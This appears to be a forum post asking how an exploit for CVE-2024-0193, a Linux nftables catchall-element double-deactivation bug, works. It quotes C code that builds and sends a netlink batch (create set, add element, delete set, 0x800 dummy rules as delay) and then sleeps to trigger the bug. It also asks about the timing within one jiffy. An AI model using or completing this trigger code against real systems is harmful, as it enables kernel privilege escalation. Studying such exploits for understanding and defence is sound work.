Some Question about nftables in CVE-2024-0193

[fuchen-03]

The vulnerability is deacvtivate catchall elem many time. But it constructs new_pipapo_set , new_set_elem_with_expiration , del_set to trig the vul. It will deactivate elem first in nft_delset func and when elem is expired, elem will be deactivated again in nft_pipapo_commit func. Why usleep function is below sending batch msg

batch = mnl_nlmsg_batch_start(buf, buf_size);

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++);
    nftnl_set_nlmsg_build_payload(nlh, set1);
    mnl_nlmsg_batch_next(batch);

    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSETELEM, family, NLM_F_CREATE, seq++);
    nftnl_set_elems_nlmsg_build_payload(nlh, set1_elem);
    mnl_nlmsg_batch_next(batch);

    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELSET, family, 0, seq++);
    nftnl_set_nlmsg_build_payload(nlh, set1);
    mnl_nlmsg_batch_next(batch);

    // delay
    for(int i = 0 ; i < 0x800; i++){
        nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
        nftnl_rule_nlmsg_build_payload(nlh, rule_dummy);
        mnl_nlmsg_batch_next(batch);
    }

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
        err(1, "mnl_socket_send");
    }

    // wait for destroy work (triggering the vulnerability)
    usleep(300*1000);   //why here below msg

[fuchen-03]

and How many operations can os complete within 1jiffies?